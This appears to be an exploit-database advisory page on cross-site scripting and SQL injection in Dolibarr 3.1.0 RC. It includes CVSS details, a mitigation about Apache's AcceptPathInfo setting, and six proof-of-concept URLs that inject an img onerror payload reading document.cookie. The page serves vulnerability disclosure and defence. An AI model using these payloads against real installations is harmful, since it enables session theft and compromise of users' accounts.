header-logo
Suggest Exploit
vendor:
Dolibarr
by:
Unknown
7.5
CVSS
HIGH
Cross-Site Scripting (XSS), SQL-Injection
79
CWE
Product Name: Dolibarr
Affected Version From: 3.1.0 RC
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Unknown
CPE: a:dolibarr:dolibarr:3.1.0_rc
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Multiple Cross-Site Scripting and SQL-Injection Vulnerabilities in Dolibarr

Dolibarr is prone to multiple cross-site scripting and SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Mitigation:

To mitigate these vulnerabilities, it is recommended to sanitize user-supplied input before using it in dynamically generated content. Additionally, ensure that the Apache directive 'AcceptPathInfo' is set to 'off' to prevent successful exploitation.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/50777/info

Dolibarr is prone to multiple cross-site scripting and SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Dolibarr 3.1.0 RC is vulnerable; prior versions may also be affected. 

http://www.example.com/index.php/%22%3E%3Cimg%20src=1%20onerror=javascript:alert%28document.cookie%29%3E
http://www.example.com/admin/boxes.php/%22%3E%3Cimg%20src=1%20onerror=javascript:alert%28document.cookie%29%3 E
http://www.example.com/comm/clients.php/%22%3E%3Cimg%20src=1%20onerror=javascript:alert%28document.cookie%29% 3E
http://www.example.com/commande/index.php/%22%3E%3Cimg%20src=1%20onerror=javascript:alert%28document.cookie%2 9%3E
http://www.example.com/admin/ihm.php?optioncss=%22%3E%3Cimg%20src=1%20onerror=javascript:alert%28document.coo kie%29%3E
http://www.example.com/user/home.php?optioncss=%22%3E%3Cimg%20src=1%20onerror=javascript:alert%28document.coo kie%29%3E

Successful exploitation of this vulnerabilities requires that Apache's directive "AcceptPathInfo" is set to "on" or "default" (default value is "default")

Navigation

Suggest Exploit

Services By CQR